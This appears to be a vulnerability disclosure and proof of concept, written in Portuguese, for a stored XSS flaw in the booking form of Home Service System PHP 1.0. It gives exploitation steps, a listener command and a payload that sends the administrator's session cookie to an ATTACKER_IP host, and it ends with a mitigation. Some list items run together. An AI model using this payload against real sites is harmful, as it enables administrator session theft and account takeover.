
Prova de conceito para CVE-2026-7089, um XSS armazenado no Home Service System PHP 1.0 que permite o sequestro de sessão de administrador sem autenticação por meio do formulário de reserva.
| Campo | Detalhes |
|---|
| Fornecedor | code-projects.org |
| Produto | Home Service System In PHP |
| Versão | 1.0 |
| Tipo de Vulnerabilidade | Cross-Site Scripting (XSS) Armazenado |
| CWE | CWE-79 |
| Autenticação Necessária | Não |
| Autor | Imad Alvi |
Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado no arquivo booking.php do
Home Service System In PHP 1.0. Usuários não autenticados podem injetar payloads
maliciosos de JavaScript através dos campos do formulário de reserva. A entrada
não sanitizada é armazenada no banco de dados e renderizada sem codificação de saída no painel
administrativo (admin.php), onde é executada no contexto do navegador do administrador.
Isso permite que um atacante não autenticado roube o cookie de sessão do administrador, execute ações em nome do administrador ou comprometa totalmente a conta administrativa.
booking.phpfname, lnameadmin.php → Gerenciar ReservasNavegue até a página de reservas como usuário não autenticado: http://TARGET/homeservices/booking.php?provider=
No campo Nome, injete o seguinte payload:
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
Preencha os campos restantes com dados válidos e envie a reserva.
Inicie um listener na sua máquina atacante:
php -S 0.0.0.0:PORT
Aguarde o administrador visitar a seção Gerenciar Reservas em admin.php.
O payload é executado no navegador do administrador, exfiltrando o cookie de sessão para o seu listener.

<script>alert(1)</script>

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>
Esta vulnerabilidade permite que um atacante remoto não autenticado comprometa totalmente a aplicação.
Um atacante pode:
PHPSESSID do administradorhtmlspecialchars() com ENT_QUOTES em toda entrada fornecida pelo usuário antes
de armazenar ou renderizar